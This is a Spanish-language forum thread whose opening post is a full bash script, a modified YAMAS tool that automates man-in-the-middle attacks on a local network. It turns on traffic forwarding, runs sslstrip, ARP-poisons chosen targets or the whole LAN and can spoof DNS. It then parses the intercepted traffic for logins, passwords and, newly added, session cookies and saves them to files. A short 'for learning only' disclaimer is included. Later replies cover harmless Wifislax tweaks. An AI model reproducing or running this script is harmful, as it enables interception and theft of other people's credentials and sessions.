Autor Tema: YAMAS 2013 Mod by vk496 (Leído 14571 veces)

vk496 · « **en:** 01-01-2014, 23:56 (Miércoles) »

Bueno, con el tema de las cookies y todo eso, se me ocurrió hacerle un pequeño mod (que no es tan pequeño, mis limitados conocimiento hicieron que me llevase horas conseguirlo) con el cual a parte de generar el archivo yamas.txt y yamas-pass.txt, se generará uno con el nombre de cookies.txt, el cual estará compuesto por el host y la cookie de cada elemento de yamas.txt

Si os pareció un lio, probarlo y vereis lo que os digo

Código: [Seleccionar]

# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Traducido por vk496 para seguridadwireless.net
# CookieMod by vk496
version="20130313"
if [ $UID -ne 0 ]; then
    echo -e "\033[31Este programa debería ejecutarse como root.
Seguramente fallara.\033[m"
    sleep 3
    fi

log_output_dir=~
sslstrip_dir=/usr/share/sslstrip
ask_for_install=y

if [ ! -d "$log_output_dir" ]; then
    mkdir -p $log_output_dir
fi

# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup() 
{
echo -e "\n\n\033[31m ^C Capturado. Limpiando y saliendo.\033[m"
if [[ $looparseid != "" ]];then
	kill $looparseid
fi

if [[ $sslstripid != "" ]];then
	kill $sslstripid
fi

if [[ $dnsid != "" ]];then
	kill $dnsid
fi

if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi

if [[ "$etter" = "1" ]];then
	killall ettercap
else
	killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush 			# there are probably too many resets here,
iptables --table nat --flush		# but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain


echo -e "\033[32m[-] Limpieza realizada con exito !\033[m"
exit 0
}

#Let's define some arguments that can be passed to the script :

#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
	-p | --parse) 
		if [[ $2 == "" ]]; then 
			echo -e "No se ha especificado ningun archivo de entrada. Saliendo... \nuso : $0 -p <file>"
			exit 0
		fi
	clear
	echo -e "Analizando $2 para creedenciales.\n\n"
	cat $2 |
	awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
	awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
	egrep -i -a -f /tmp/grepcred.txt |
	awk -F "=" '{if (length($2) < 4) print "";
	else if ($1 ~/Website/) print $0;
	else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
	else if ($1 ~/available/) print "";
	else if ($1 ~/last/) print "";
	else print "Login = \t"$2}' |
	uniq
	cat $2 | grep -a -e "cookie :" -e "host :" | awk '/host/&&!t{t=$0} /cookie/&&t{print t;print;t=""}' | awk '{$1=""; $2=""; $3=""; $4=""; print}' | sed '/host/i\ ' | sed -e 's/^ *//' >/tmp/cookies.txt
	exit 0 ;;
	
	-pl) while :
	do
	clear
	echo -e "Analizando $2 para creedenciales.\n\n"
	cat $2 |
	awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
	awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
	egrep -i -a -f /tmp/grepcred.txt |
	awk -F "=" '{if (length($2) < 4) print "";
	else if ($1 ~/Website/) print $0;
	else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
	else if ($1 ~/available/) print "";
	else if ($1 ~/last/) print "";
	else print "Login = \t"$2}' |
	uniq
	cat $2 | grep -a -e "cookie :" -e "host :" | awk '/host/&&!t{t=$0} /cookie/&&t{print t;print;t=""}' | awk '{$1=""; $2=""; $3=""; $4=""; print}' | sed '/host/i\ ' | sed -e 's/^ *//' >/tmp/cookies.txt
	sleep 3
	done ;;

	-e | --etter) echo -e "\tVas a usar Ettercap en vez de ARPspoof."
	etter="1"
	shift
	sleep 0.5 ;;

	-h | --help) clear 
	echo -e "Estas ejecutando $0, version $version.


Uso : $0 -h -c -p -e -s -f
	-h o --help  :   Muestra este mensaje de ayuda, aviso legal y sale.
	-c o --change: Muestra changelog.   	
	-e :   Utilice ettercap en lugar de ARPspoof. Podriamos tener razones propias ...
			ARPspoof es el predeterminado.
	-p or --parse :	Solo analizar un <file>. No utilize caracteres comodines.
			Utilice> / output_file para imprimir en un archivo.
	-s : Modo invisible. El script no se descarga nada.
	-f : Utilice  padlock favicon en sslstrip.
	
\033[31m EXENCION DE RESPONSABILIDAD :\033[m
Este programa esta ha sido creado con el unico proposito del aprendizaje. 
No justifico la pirateria y no sere responsable de sus acciones. 
Puede enfrentarse a consecuencias legales si utiliza este script 
para actividades ilegales.

\033[31m Lo que creo que se debe aprender de este script :\033[m
Este script le enseñara lo facil que es obtener credenciales en linea 
sensible y como protegerse de ello, a condicion de que entiende
lo que hace el programa. La mejor manera de entender lo que hace es
buscar en su origen. Esto también le ayudara a entendre algunas 
secuencias basicas de comandos shell."
exit 0 ;;

	-c | --change)
	clear
	echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help

\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features

\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to thif [[ $2 == "" ]]; then 
			echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
			exit 0
		fie people responsible for the tools I am using in this script.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
	exit ;;

	-s | --silent)
	echo "Stealth mode ON"
	silent="1"
	shift ;;

	-f | --fav)
	echo "favicon mode ON"
	fav="-f"
	shift ;;

	-t)
	time="$4" ;;

	*) shift ;;
esac

done

### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
	message="\nNo se mostrara ningun mensaje : esta en modo silencioso"
else
	message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi

if [[ $1 = "-s" || $2 = "-s" ]]; then
	echo "Las tablas ASCII no estaran disponibles."
	echo "Las tablas ASCII no estan disponibles porqu esta en modo silecioso." > /tmp/ascii
else
	wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi

### Check for updates !
if [[ "$silent" = "1" ]];then
	echo "No se comprueba nuevas versiones : Modo silecioso."
else
	changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
	last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
	if [[ $last_version > $version ]];then # Comparing to current version
		echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
		read update
		if [[ $update = Y || $update = y ]];then
			echo "[+] Updating script..."
			wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
			chmod +x $0
			echo "[-] Script updated !"
			if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
				echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
				read install
				if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
					cp $0 /usr/bin/yamas
					chmod +x /usr/bin/yamas
					echo "Script should now be installed, launching yamas !"
					sleep 3
					yamas
					exit 1
				else
					echo "Ok, continuing with updated version..."
					sleep 3
					$0
					exit 1
				fi
			fi
		
		sleep 2
		$0
		exit 1
		else
			echo "Ok, continuing with current version..."
		fi
	else
		echo "No update available"
	fi
fi
### End of update process

### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
	echo "Script is not installed. Do you want to install it ? (Y/N)"
	read install
	if [[ $install = Y || $install = y ]] ; then
		cp -v $0 /usr/bin/yamas
		chmod +x /usr/bin/yamas
		rm $0
		echo "Script should now be installed. Launching it !"
		sleep 3
		yamas
		exit 1
	else
		echo "Ok, not installing then !"
	fi
else
	echo "Script instalado"
	sleep 1
fi
### End of install process

clear
echo -e "
                                                               
     \`YMM'   \`MM'   db      \`7MMM.     ,MMF'      db       .M\"\"\"bgd 
       VMA   ,V    ;MM:       MMMb    dPMM       ;MM:     ,MI    \"Y 
        VMA ,V    ,V^MM.      M YM   ,M MM      ,V^MM.    \`MMb.     
         VMMP    ,M  \`MM      M  Mb  M' MM     ,M  \`MM      \`YMMNq. 
          MM     AbmmmqMA     M  YM.P'  MM     AbmmmqMA   .     \`MM 
          MM    A'     VML    M  \`YM'   MM    A'     VML  Mb     dM 
        .JMML..AMA.   .AMMA..JML. \`'  .JMML..AMA.   .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-bt5                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version \033[32m$version\033[m                    		  =
==========================================================================="
echo -e "\033[36mMensaje del dia :\033[m"
echo -e "$message"
echo

# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Limpiando iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Limpiado."

# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m[+] Matando procesos y reseteando iptables.\033[m"
kill $sslstripid
kill $looparseid

if [[ $drifton = 1 ]]; #if driftnet was used 
      then
	  echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
	      if [[ ! -e $log_output_dir/capture_$(date +%d%m%y) ]]; #check if destination folder exists, since driftnet won't create one nor save images
		  then
		  mkdir $log_output_dir/capture_$(date +%d%m%y) #create if needed
	      fi
	  cp /tmp/driftnet* $log_output_dir/capture_$(date +%d%m%y) #copy all content from driftnet's temp folder to destination
	  killall driftnet #kill the unbeliever
	  elif [[ $drifton = 2 ]]; #if tcpxtract was used
	  then
	  killall tcpxtract  #kill it...
fi

if [[ "$etter" = "1" ]];then
	killall ettercap
else
	killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush 			# there are probably too many resets here,
iptables --table nat --flush		# but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
echo -e "\033[32m[-] Limpieza realizada con exito !\033[m"
echo -e "\nDesea guardar el log para revisarlo mas tarde o deberia ser eliminado? (Y=Guardar)"
echo "(Si desea guardarlo, se alojará en $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
	cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
	if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
		echo "Log copiado !" #it does
		else echo "Error mientras se copiaba el log. Entra en /tmp/ para $filename.txt" #it does not
	fi
else
	echo "Archivos temporales no guardados"
fi

echo -e "\nDesea guardar las cookies en un archivo? (Y=guardar)"
echo "(Si desea guardarlo, se almacenara en $log_output_dir/cookies.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
   cp /tmp/cookies.txt $log_output_dir/cookies.txt #moving file
   if [ -f "$log_output_dir/cookies.txt" ]; then #check if it exists
      echo "Log file copiado !" #it does
      else echo "Error al copiar archivo de registro. Mirar /tmp/ for cookies.txt" #it does not
   fi
else
   echo "Cookies no guardadas"
fi

echo -e "\nDesea guardar las contraseñas en un archivo? (Y=Guardar)"
echo "(Si desea guardarlo, se alojará en $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
	cat /tmp/$filename.txt |
	awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
	awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
	egrep -i -a -f /tmp/grepcred.txt |
	awk -F "=" '{if (length($2) < 4) print "";
	else if ($1 ~/Website/) print $0;
	else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
	else print "Login = \t"$2}' |
	uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
	if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
		echo "Contraseñas guardadas !" #it does
	else
		echo "Error mientras se guardaban las contraseñass" #it does not
	fi
else
	echo "Guardado de contraseñas omitido."
fi

rm /tmp/$filename.txt
echo -e "\nArchivos temporales eliminados."
exit
}

search=$(ip route show | grep src | awk '{ print $1}') #store gateway/24 for whole network mapping to variable
#Si no se pone 'grep src', cogerá la subnet "127.0.0.0/8" (vk496)
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.

rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}

add_target()
{
echo "Itroduzca la nueva IP para atacar :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}

ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}

dns_spoof()
{

### Make Host function###
	mkhst() 
	{
	echo "Introduzca su lista de redireccionamiento linea por linea. Termine con #.
Ejemplo : 127.0.0.1 foo.bar.com
Puede usar caracteres comodines."
	if [ -e '~/hosts_spoof']; then 
	rm ~/hosts_spoof
	fi
	while :
	do
		read input
		echo "$input" >> ~/hosts_spoof
		if [[ $input == "#" ]];then
			break
		fi
	done
	}

###EOfunc###
echo "Si tiene un archivo host, introduzca su ruta. Si no es así, pulse ENTER."
read gothost
if [[ $gothost != "" ]];then
	echo "El archivo de host $gothost será usado."
else
	echo -e "Vamos a hacer uno...\n"
	mkhst
fi

xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}

choose_dns()
{
echo "Desea usar Ettercap 'dns_spoof' plugin o dnsspoof (E/D) ? Pulse A para abortar"
read spoofpgm
case $spoofpgm in
	E) echo "Usaremos ettercap. Asegurate de haber editado /usr/share/ettercap/etter.dns"
	ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
	
	D) echo "Usaremos dnsspoof."
	dns_spoof ;;

	a | A) final ;;

	*) echo "Opcion incorrecta. Pulse E o D"
	choose_dns;;
esac

final
}

misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
	1) image_menu
	   final ;;
	2) choose_dns ;;
	3) final ;;
	*) echo "bad choice"
	  misc ;;
esac
}

image_menu()
{
echo -e "Desea usar driftnet (mostrar imagenes) o tcpxtract ?
1. Tcpxtract (Guarda todas las imagenes a $log_output_dir/capture[date])
2. Driftnet (Muestra todas las imagenes en pantalla y las guarda en $log_output_dir/capture[date])"
read image_choice
case $image_choice in 
	1) tcpxtract -d $iface -o $log_output_dir/capture_$(date +%d%m%y) > /dev/null & tcpid=$!
	   drifton=2 
	   echo "tcpxtract se ha ejecutado con el pid $tcpid"
	   misc ;;
	2) 	   driftnet -i $iface -d /tmp/ &> /dev/null &
	   drifton=1
	   echo "Driftnet ejecutado." 
	   misc ;;
esac
}

rtparse()
{
echo -e "\n\nEn este menu puede pausar, reanudar, cerrar o ejecutar
el analisis en vivo (RTP).
1. Pausar RTP (mantiene xterm abierto para que lea, copie-pegue, etc.)
2. Reanudar RTP.
3. Cerrar RTP (detiene y cierra xterm)
4. Re-lanzar RTP
5. Menu anterior."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out?  It's singular options without a space, so I think the need for quotes is NOT needed??
	1) echo -e "\033[33m[+]Pausando...\033[m"
	kill -19 $looparseid
	echo -e "\033[33m[-]Pausado.\033[m"
	rtparse;;

	2) echo -e "\033[33m[+]Reanudando...\033[m"
	kill -18 $looparseid
	echo -e "\033[33m[-]Reanudado.\033[m"
	rtparse;;

	3) echo -e "\033[31m[+]Cerrando...\033[m"
	kill $looparseid
	echo -e "\033[33m[-]Cerrado.\033[m"
	rtparse;;

	4) echo -e "\033[32m[+]Lanzando...\033[m"
	xterm -hold -geometry 90x20-1-100 -T Passwords -e $0 -pl /tmp/$filename.txt & looparseid=$!
	sleep 2
	echo -e "\033[33m[-]Lanzado.\033[m"
	rtparse;;

	5) echo "Anterior"
	final ;;

	*) echo -e "\033[31mMala eleccion chaval !\033[m\n" #Professional Language =)
	rtparse;;
esac
}

final()
{
echo -e "\n\033[32mEl ataque se esta ejecutando\033[m. Puede :
1. Reanalizar la red.
2. Añadir objetivo (Inutil si es sobre toda la red).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.

Introduzca el numero de la opcion deseada."
read final
case $final in
	1) rescan ;;

	2) add_target ;;

	3) ascii ;;

	4) rtparse ;;

	5) misc ;;

	6) cleanup ;;

	*) echo -e "\033[31mMala eleccion tio !\033[m\n" #was "motherfucker" during my tests.
	final ;;
esac
}

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31m [+] Activando IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activado."

#Iptables
echo
echo -e "\033[31m [+] Configurando iptables...\n \033[m"
echo -en "\033[31m Hacia \033[mque puerto debe ser redirigido el trafico? (por defecto = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
	outport=8080
	echo -e "Puerto $outport seleccionado como predeterminado.\n"
fi

echo -en "\033[31m Desde \033[mque puerto debe ser redirigido el trafico? (por defecto = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
	inport=80
	echo -e "Puerto $inport seleccionado como predeterminado.\n"
fi

echo -e "\n\033[33m El trafico del puerto $inport se redirige al puerto $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo  "Elija el nombre del archivo : (Por defecto = yamas)"
read -e filename
if [ "$filename" = "" ];then
	filename="yamas"
fi

echo -e "\033[33m Sslstrip escucha en el puerto $outport y se guarda el log en /tmp/$filename.txt\033[m"

if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
	if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
		chmod +x $sslstrip_dir/sslstrip.py #make it executable
	fi
	$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
	sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi

sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip esta ejecutandose." # a bit redundant, but who cares?
echo

#Arpspoofing
echo
echo -e "\033[31m [+] Activando ARP envenenamiento de cache... \033[m"
echo
ip route show | awk '(NR == 1) { print "Puerta de enlace :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Escriba la direccion IP de la puerta de enlace o pulse Intro para utilizar $gateway."
read -e gateway
if [ "$gateway" = "" ];then
	gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
	echo -e "$gateway seleccionado como predeterminado.\n"
fi

echo
echo "Que interfaz le gustaria usar? Debe coincidir con puerta de enlace IP como se muestra arriba. Pulse Intro para usar $iface."
read -e iface
if [ "$iface" = "" ];then
	iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
	echo -e "$iface seleccionado como predeterminado.\n"
fi

echo -e "\r"
echo -e "Nos concentraremos en toda la red de forma predeterminada. Usted puede \033[4mD\033[mescubrir hosts e introducir IP(s) de forma manual \033[4mD\033[m..
Pulsa INTRO para elegir por defecto."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
	echo -e "\nDesea escanear la red en busca de hosts activos? (Y/N)	[Esto puede tardar hasta 30 segundos, sea paciente]"
	read -e hosts
	echo -e "\033[31m "
	if [[ $hosts = "Y" || $hosts = "y" ]];then
		nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
		echo -e "\033[m " # switch color back to white
	else
		echo -e "\033[m "
	fi
	echo -e "Por favor, introduzca las IP(s) de la siguiente forma : IP1 IP2 IP3...
\033[31m Cuidado! Esto se generan tantas ventanas como blancos de entrada y podría ralentizar actuaciones. Si ese fuera el caso, a continuacion, utilizar la orientación de toda la red.\033[m "
	arpspoofi()
	{ # We launch ARPspoof in different xterm windows to keep script running
	while [ "$1" != "" ];do
		xterm -geometry 90x3-1-1 -T "Envenenando $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
		shift 
	done

	echo -e "\033[33m Lanzando $parameters en $gateway desde $iface con ARPspoof\033[m"
	}

	ettercapi()
	{ # We launch ARPspoof in different xterm windows to keep script running
	while [ "$1" != "" ];do
		xterm -geometry 90x3-1-1 -T "Envenenando $1" -e ettercap -o -q -i $iface -T -M arp  /$gateway/ /$1/ 2>/dev/null & sleep 2
		shift
	done

	echo -e "\033[33m Lanzando $parameters en $gateway desde $iface con Ettercap\033[m"
	}

	read -e parameters
	if [[ "$etter" = "1" ]];then
		ettercapi $parameters
	else
		arpspoofi $parameters
	fi

else 
	if [[ "$etter" = "1" ]];then
		xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp  // // &
		sleep 2
		echo -e "\033[33m Lanzando sobre toda la red en $gateway desde $iface con Ettercap\033[m"
	else
		xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
		sleep 2
		echo -e "\033[33m Lanzando sobre toda la red en $gateway desde $iface con ARPspoof\033[m"
	fi
fi

echo -e "[-] ARP envenenamiento de cache se ha ejecutado. \033[31m Deja la(s) nueva(s) ventana(s) ejecutandose. \033[m"
echo -e "\n\033[32m El ataque debería estar ejecutandose dentro de poco, disfruta.\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e $0 -pl /tmp/$filename.txt & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.

Salu2

vk496 · « **Respuesta #1 en:** 02-01-2014, 00:02 (Jueves) »

Por cierto, para un mejor parseo de datos con grep sobre Wifislax en un futuro, creo que no estaría mal que se implementase esto por defecto

export GREP_OPTIONS='--color=auto'

si no, se hace imposible ver algo cuando sale mucho texto...

Salu2

USUARIONUEVO · « **Respuesta #2 en:** 02-01-2014, 22:26 (Jueves) »

Cita de: vk496 en 02-01-2014, 00:02 (Jueves)

Por cierto, para un mejor parseo de datos con grep sobre Wifislax en un futuro, creo que no estaría mal que se implementase esto por defecto

export GREP_OPTIONS='--color=auto'

si no, se hace imposible ver algo cuando sale mucho texto...

Salu2

y eso donde deberia ponerse ??

imagino en alguna d elas partes en la secuencia de arranque de sistema.

USUARIONUEVO · « **Respuesta #3 en:** 02-01-2014, 22:34 (Jueves) »

ya esta

o eso creo , confirmame que con este modulo , queda como propones.

la cuestion es que en

/etc/profile.d/

se pueden espeficicar este tipo de variables para el sistema.

wifislax_custom_exports-1.0-noarch-1sw.xzm (4 KB) http://www.multiupload.nl/0OT5KQ41PY

vk496 · « **Respuesta #4 en:** 02-01-2014, 22:41 (Jueves) »

Este tipo de información se suele almacenar en /root/.bashrc (creo recordar). Creo que es mejor dejarlo allí, porque el resto de colores que se definen para el terminal tambien se almacenan allí.

Sali2

USUARIONUEVO · « **Respuesta #5 en:** 02-01-2014, 22:44 (Jueves) »

añadirlo al bashrc es mas facil aun y hay seguro que rula , ...

te lo dejo añadido al bashrc , si este funciona es mejor opcion que ponerlo en etc/profile

bashrc-con-export-colors-grep.xzm (4 KB) http://www.multiupload.nl/260LBSSBML

jodder , que bueno ,,, no se como he podido vivir sin esto ..jajaj

ahora al usar grep , ... la palabra clave aparece en rojo en las busquedas y las rutas en color violeta.

vk496 · « **Respuesta #6 en:** 03-01-2014, 01:53 (Viernes) »

https://foro.seguridadwireless.net/colaboracion-y-desarrollo-de-nuestras-lives/iso-wifislax-4-7-rc2/msg290351/#msg290351

jajajaja

Salu2

USUARIONUEVO · « **Respuesta #7 en:** 03-01-2014, 02:22 (Viernes) »

Cita de: vk496 en 03-01-2014, 01:53 (Viernes)

https://foro.seguridadwireless.net/colaboracion-y-desarrollo-de-nuestras-lives/iso-wifislax-4-7-rc2/msg290351/#msg290351

jajajaja

Salu2

pero no me diste la solucion , y tampoco lo entendia , nunca he usado otro linux , y desconozco muchas cosas.

si me dices ponem un export = .. pues lo pongo ...ahora si me dices quiero colorines cuando hago un grep .. pues a lo mejor quedo con cara de ******, por que no se lo que pides al no haberlo visto nunca.

ejemplo practico

yo te pido un habitante de marte , y tu dices ¿ como ? ..este flipa

pero si te digo , en el area 51 , en estas coordenadas hay uno ...

pues entonces a lo mejor si que me lo traes.

aunque lo mas normal seria que pensaras, " Este a empeorado"

vk496 · « **Respuesta #8 en:** 03-01-2014, 02:28 (Viernes) »

jajajaja OKOK, tu ganas

Ya que estamos, creo que sería práctico introducir un atajo de teclado para abrir rapidamente la terminal (no se si solo soy yo, pero desde Wifislax uso muchisimo la terminal)

En Ubuntu es con Ctrl + Alt + T

No sé si es factible o no, pero yo lo dejo allí.

(Si interesa, buscaré como hacerlo desde Wifislax

)

Salu2

USUARIONUEVO · « **Respuesta #9 en:** 03-01-2014, 02:34 (Viernes) »

Cita de: vk496 en 03-01-2014, 02:28 (Viernes)

jajajaja OKOK, tu ganas

Ya que estamos, creo que sería práctico introducir un atajo de teclado para abrir rapidamente la terminal (no se si solo soy yo, pero desde Wifislax uso muchisimo la terminal)

En Ubuntu es con Ctrl + Alt + T

No sé si es factible o no, pero yo lo dejo allí.

(Si interesa, buscaré como hacerlo desde Wifislax )

Salu2

creo que eso es facil ....

USUARIONUEVO · « **Respuesta #10 en:** 03-01-2014, 02:37 (Viernes) »

ERA TAN FACIL QUE YA LO TENGO

preferencias del sistema -->> acciones rapidas y gestos -->> accesos rapidos personalizados

activa el "Examples" ... y dentro de esa categoria esta el terminal , tal cual tu pones aqui

ctrl + alt + t

asi que , ahora hago un modulo ...

USUARIONUEVO · « **Respuesta #11 en:** 03-01-2014, 02:44 (Viernes) »

funciona en kde , la T puede ser mayuscula o minusculA , FUNCIONARA IGUAL.

voy mirar en xfce ...

este es para kde
hotkeys-terminal.xzm (8 KB) http://www.multiupload.nl/992RT2ZMBG

_____________________

version 2 , este funciona en kde y xfce

en kde da igual si la letras T es mayuscula o minuscula, pero en xfce solo funciona si la t es minuscula.

hotkeys-terminal-kde+xfce.xzm (8 KB) http://www.multiupload.nl/L3A8ZYEN9C

Noticias:

Autor Tema: YAMAS 2013 Mod by vk496 (Leído 14571 veces)

vk496

YAMAS 2013 Mod by vk496

vk496

Re: YAMAS 2013 Mod by vk496

USUARIONUEVO

Re: YAMAS 2013 Mod by vk496

USUARIONUEVO

Re: YAMAS 2013 Mod by vk496

vk496

Re: YAMAS 2013 Mod by vk496

USUARIONUEVO

Re: YAMAS 2013 Mod by vk496

vk496

Re: YAMAS 2013 Mod by vk496

USUARIONUEVO

Re: YAMAS 2013 Mod by vk496

vk496

Re: YAMAS 2013 Mod by vk496

USUARIONUEVO

Re: YAMAS 2013 Mod by vk496

USUARIONUEVO

Re: YAMAS 2013 Mod by vk496

USUARIONUEVO

Re: YAMAS 2013 Mod by vk496